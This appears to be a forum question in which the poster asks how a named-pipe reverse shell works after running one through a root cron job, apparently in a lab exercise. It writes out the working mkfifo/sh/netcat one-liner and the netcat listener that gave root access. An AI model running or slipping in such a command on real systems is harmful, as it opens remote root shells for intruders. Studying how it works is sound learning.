Reverse shell with named pipe and netcat
The root user calls
cron which causes a script with the following content to run (I adapted the script a bit):
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f
I'm trying to wrap my head around the interaction between
sh, netcat, and the named pipe
Here's my literal reading of the command:
- Create a new named pipe at
- Write the contents of
/tmp/fto an interactive shell.
- Write the output of the shell to netcat.
- The output of netcat is written to the named pipe
After running the command and creating a listening netcat server locally with
nc -lvnp 4445 I indeed got root access.
I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.